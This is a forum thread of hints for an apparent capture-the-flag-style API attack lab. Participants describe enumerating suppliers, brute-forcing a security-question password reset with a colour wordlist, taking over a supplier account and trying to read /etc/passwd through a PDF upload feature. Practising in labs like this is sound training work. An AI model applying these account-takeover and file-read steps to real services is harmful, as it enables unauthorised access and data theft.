Has anyone else had any luck with solving this. I have enumerated the supplier with a security question set but have not had any luck brute forcing the password reset through the security question.
Thank you
Has anyone else had any luck with solving this. I have enumerated the supplier with a security question set but have not had any luck brute forcing the password reset through the security question.
Thank you
If your like me, You just need a really big wordlist.
A hint is that it is a fairly popular programing language
can u provide the wordlist ? cuz have been searching for one
Just to point out that the attention to detail matters a lot here, sp make sure to take your time and carefully inspect each response.
Another tip that I would give is to search and find different wordlists when trying a brute-force attack at any point.
find the color wordlist on github. If all goes well then you just got to change the supplier logins
Hello. I will like to know if this discussion is about the new module for API attack assessment ? Because the discussion seems to be different from the difficulties I am facing. I am having the same error message when trying to upload a pdf file. Has anyone solve this ?
Yes, Try uploading the pdf file not as the customer but as a supplier. Get a way to authenticate yourself as a supplier from the password reset options available. Let me know if you need further assistance. Cheers
Thanks for the tip. I will try that.
okay.
Hi everyone, I’m stuck with this task right now. I brute-forced the user, uploaded a PDF, and am trying to use it to update and view /etc/passwd
, but nothing is working.
{
"successStatus": false,
"base64Data": "An error occurred while reading the file."
}
are you reading the /etc/passwd as a customer or as a supplier.
as a supplier
i have only 2 acc Br**don R*gers and htbpentester
Wait… this is the skills assessment right?
yep
I also didn’t understand the clue of the guy who said it’s a popular programming language, maybe that’s why I’m stumped.
Hey I was making the same mistake. Read the question again at the bottom of the skills assessment page, it’s not asking you to get the base64 from the /etc/passwd file path, it’s asking you something else. Hope this helps!
Does the list of colors need to be mutated or is the password all lower case?
Nevermind, worked it out
jq the list of suppliers and select(.securityQuestion != “SupplierDidNotProvideYet”).
You’ll end up with around 5 potential targets and all have the same question (which hints at what you should fill your wordlist with). I only had 75 words in my list.